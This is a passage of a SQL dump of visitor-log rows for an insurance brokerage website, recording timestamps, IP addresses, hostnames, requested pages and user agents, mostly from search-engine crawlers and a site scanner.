+http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(11480,'0b_622b06197dd21199439cf2b3cdd2ae01','1459603436','141.8.143.235','spider-141-8-143-235.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11483,'0b_185e2e7232c3eeb54e098c748e8f3603','1459603436','100.43.81.146','spider-100-43-81-146.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11484,'0b_2c69114dd741b9a692787ef701d136f3','1459603441','199.21.99.194','spider-199-21-99-194.yandex.com','/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(11487,'0b_75755f788f1f98da108fa4a0ec118111','1459604078','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11490,'0b_75755f788f1f98da108fa4a0ec118111','1459604079','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11492,'0b_75755f788f1f98da108fa4a0ec118111','1459604080','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11495,'0b_75755f788f1f98da108fa4a0ec118111','1459604081','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11496,'0b_75755f788f1f98da108fa4a0ec118111','1459604082','207.46.13.149','msnbot-207-46-13-149.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11498,'0b_35ba94eb2581c8dfedf94f24343dda8e','1459604093','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/igo/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11499,'0b_35ba94eb2581c8dfedf94f24343dda8e','1459604094','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11502,'0b_35ba94eb2581c8dfedf94f24343dda8e','1459604095','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11504,'0b_75c5669aae7736f9813beb78f27b7d78','1459605515','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11507,'0b_75c5669aae7736f9813beb78f27b7d78','1459605517','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11508,'0b_75c5669aae7736f9813beb78f27b7d78','1459605518','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11511,'0b_75c5669aae7736f9813beb78f27b7d78','1459605518','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/term-quotes/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11513,'0b_75c5669aae7736f9813beb78f27b7d78','1459605521','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/members/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11516,'0b_75c5669aae7736f9813beb78f27b7d78','1459605522','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11517,'0b_75c5669aae7736f9813beb78f27b7d78','1459605523','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11520,'0b_75c5669aae7736f9813beb78f27b7d78','1459605523','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/?page_id=169','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','3','0',0),(11523,'0b_772e72c6a08fa03a9d67dfa74f5ae33d','1459605915','188.227.74.190','188.227.74.190','/','Opera/9.80 (S60; SymbOS; Opera Mobi/447; U; en) Presto/2.4.18 Version/10.00','http://www.empireins.com/','',0,'','Opera 9','ru','','','Opera','','','','0','0',0),(11526,'0b_3fe13525f45928c3dd8500b8bc57e1d5','1459609359','69.175.22.218','newscan02.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11529,'0b_3fe13525f45928c3dd8500b8bc57e1d5','1459609362','69.175.22.218','newscan02.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11532,'0b_3fe13525f45928c3dd8500b8bc57e1d5','1459609365','69.175.22.218','newscan02.sitelock.com','/igo/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11535,'0b_3fe13525f45928c3dd8500b8bc57e1d5','1459609375','69.175.22.218','newscan02.sitelock.com','/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11537,'0b_3fe13525f45928c3dd8500b8bc57e1d5','1459609377','69.175.22.218','newscan02.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(11538,'0b_d75959a00009f862ee6ba8949c27454d','1459610166','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11540,'0b_4db8a5c7aa68f47feca4c9d455863c18','1459610505','107.189.60.68','107.189.60.68','/','Mozilla/5.0 (compatible; PrivacyAwareBot/1.1; +http://www.privacyaware.org)','','',0,'','','us','','','','','','','0','0',0),(11543,'0b_d9cde5de8c6ab92f81234f91a03459ad','1459611311','157.55.39.113','msnbot-157-55-39-113.search.msn.com','/agent-tools/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11544,'0b_aa300768ca8151b0a74d49a00b08c619','1459611690','180.76.15.140','baiduspider-180-76-15-140.crawl.baidu.com','/licensing-contracting/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(11546,'0b_f7f62d84bc10df8a687c6556064abe85','1459612399','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11547,'0b_f7f62d84bc10df8a687c6556064abe85','1459612399','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11550,'0b_f7f62d84bc10df8a687c6556064abe85','1459612400','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11552,'0b_f7f62d84bc10df8a687c6556064abe85','1459612411','66.87.120.5','66-87-120-5.pools.spcsdns.net','/forms/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11555,'0b_f7f62d84bc10df8a687c6556064abe85','1459612924','66.87.120.5','66-87-120-5.pools.spcsdns.net','/forms/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/forms/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11556,'0b_f7f62d84bc10df8a687c6556064abe85','1459613002','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/forms/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11559,'0b_f7f62d84bc10df8a687c6556064abe85','1459613003','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11561,'0b_f7f62d84bc10df8a687c6556064abe85','1459613010','66.87.120.5','66-87-120-5.pools.spcsdns.net','/insentives/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11562,'0b_f7f62d84bc10df8a687c6556064abe85','1459613133','66.87.120.5','66-87-120-5.pools.spcsdns.net','/agent-tools/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/insentives/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11564,'0b_f7f62d84bc10df8a687c6556064abe85','1459613142','66.87.120.5','66-87-120-5.pools.spcsdns.net','/insentives/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/agent-tools/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11567,'0b_f7f62d84bc10df8a687c6556064abe85','1459613198','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/insentives/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11568,'0b_f7f62d84bc10df8a687c6556064abe85','1459613198','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11571,'0b_f7f62d84bc10df8a687c6556064abe85','1459613199','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11573,'0b_f7f62d84bc10df8a687c6556064abe85','1459613208','66.87.120.5','66-87-120-5.pools.spcsdns.net','/about-us/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11576,'0b_f7f62d84bc10df8a687c6556064abe85','1459613216','66.87.120.5','66-87-120-5.pools.spcsdns.net','/licensing-contracting/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/about-us/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11577,'0b_f7f62d84bc10df8a687c6556064abe85','1459613221','66.87.120.5','66-87-120-5.pools.spcsdns.net','/carriers/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/licensing-contracting/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11579,'0b_f7f62d84bc10df8a687c6556064abe85','1459613232','66.87.120.5','66-87-120-5.pools.spcsdns.net','/contact/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/carriers/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11580,'0b_f7f62d84bc10df8a687c6556064abe85','1459613239','66.87.120.5','66-87-120-5.pools.spcsdns.net','/igo/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/contact/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11582,'0b_f7f62d84bc10df8a687c6556064abe85','1459613409','66.87.120.5','66-87-120-5.pools.spcsdns.net','/about-us/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/igo/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11583,'0b_f7f62d84bc10df8a687c6556064abe85','1459613440','66.87.120.5','66-87-120-5.pools.spcsdns.net','/insentives/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/about-us/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11586,'0b_f7f62d84bc10df8a687c6556064abe85','1459613454','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/insentives/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11588,'0b_f7f62d84bc10df8a687c6556064abe85','1459613455','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11589,'0b_f7f62d84bc10df8a687c6556064abe85','1459613462','66.87.120.5','66-87-120-5.pools.spcsdns.net','/forms/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11591,'0b_f7f62d84bc10df8a687c6556064abe85','1459613469','66.87.120.5','66-87-120-5.pools.spcsdns.net','/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/forms/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11594,'0b_f7f62d84bc10df8a687c6556064abe85','1459613469','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11595,'0b_f7f62d84bc10df8a687c6556064abe85','1459613470','66.87.120.5','66-87-120-5.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','0',0),(11598,'0b_f7f62d84bc10df8a687c6556064abe85','1459613497','66.87.120.5','66-87-120-5.pools.spcsdns.net','/about-us/','Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; SM-T217S Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30','http://www.empireins.com/','',0,'Android 4','Safari 4','us','600 x 1024','','','','','','0','51',0),(11601,'0b_86e8ab863f0183d94b5dc4a9bfef94d6','1459614882','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11603,'0b_2de5fffa9ed6856833ece1e1e0d81def','1459615873','157.55.39.75','msnbot-157-55-39-75.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(11606,'0b_ea8701fe61f6a9a26760577177468da4','1459615873','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/feed/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(11609,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616523','85.25.197.18','astra3082.startdedicated.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11612,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616525','85.25.197.18','astra3082.startdedicated.com','/about-us/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11613,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616525','85.25.197.18','astra3082.startdedicated.com','/contact/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11615,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616527','85.25.197.18','astra3082.startdedicated.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11616,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616527','85.25.197.18','astra3082.startdedicated.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11618,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616528','85.25.197.18','astra3082.startdedicated.com','/register/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11619,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616529','85.25.197.18','astra3082.startdedicated.com','/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11622,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616531','85.25.197.18','astra3082.startdedicated.com','/about-us/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11624,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616532','85.25.197.18','astra3082.startdedicated.com','/insentives/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11625,'0b_8b479e375159b686e3d4aba6ed1ca7bf','1459616532','85.25.197.18','astra3082.startdedicated.com','/licensing-contracting/','Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)','','',0,'Win8 x64','IE 10','','','','','','','','0','0',0),(11628,'0b_ddf67bea6348494a9354c14821d4c62b','1459616533','85.25.197.18','astra3082.startdedicated.com','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11631,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616535','85.25.197.18','astra3082.startdedicated.com','/contact/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11633,'0b_ddf67bea6348494a9354c14821d4c62b','1459616536','85.25.197.18','astra3082.startdedicated.com','/case-status/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11636,'0b_ddf67bea6348494a9354c14821d4c62b','1459616536','85.25.197.18','astra3082.startdedicated.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11639,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616540','85.25.197.18','astra3082.startdedicated.com','/igo/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11642,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616540','85.25.197.18','astra3082.startdedicated.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11643,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616541','85.25.197.18','astra3082.startdedicated.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11645,'0b_ddf67bea6348494a9354c14821d4c62b','1459616543','85.25.197.18','astra3082.startdedicated.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11646,'0b_ddf67bea6348494a9354c14821d4c62b','1459616544','85.25.197.18','astra3082.startdedicated.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11648,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616544','85.25.197.18','astra3082.startdedicated.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11651,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616546','85.25.197.18','astra3082.startdedicated.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11654,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616547','85.25.197.18','astra3082.startdedicated.com','/?page_id=169','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11657,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616548','85.25.197.18','astra3082.startdedicated.com','/register/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11658,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616549','85.25.197.18','astra3082.startdedicated.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11661,'0b_b5e326bce49af58b06a95a5a12b8774b','1459616549','85.25.197.18','astra3082.startdedicated.com','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36','','',0,'Win7','Chrome 41','','','','','','','','3','0',0),(11664,'0b_ddf67bea6348494a9354c14821d4c62b','1459616550','85.25.197.18','astra3082.startdedicated.com','/members/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11667,'0b_ddf67bea6348494a9354c14821d4c62b','1459616551','85.25.197.18','astra3082.startdedicated.com','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1','','',0,'Win7 x64','Firefox 40','','','','','','','','0','0',0),(11669,'0b_58f07c9babc0ff87f7b001172ebe49e1','1459618059','78.46.50.246','majestic12.co.uk','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(11672,'0b_58f07c9babc0ff87f7b001172ebe49e1','1459618061','78.46.50.246','majestic12.co.uk','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(11673,'0b_58f07c9babc0ff87f7b001172ebe49e1','1459618063','78.46.50.246','majestic12.co.uk','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','gb','','','MJ12bot','','','','0','0',0),(11675,'0b_b263cc9f1904c0e2d1f8a9b7d15b0008','1459619950','54.227.115.246','ec2-54-227-115-246.compute-1.amazonaws.com','/','User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31','','',0,'Win7','','','','','Internet','','','','0','0',0),(11676,'0b_e820161d78c8eb68fc46c70bc9f762e1','1459620666','142.105.32.180','cpe-142-105-32-180.nj.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 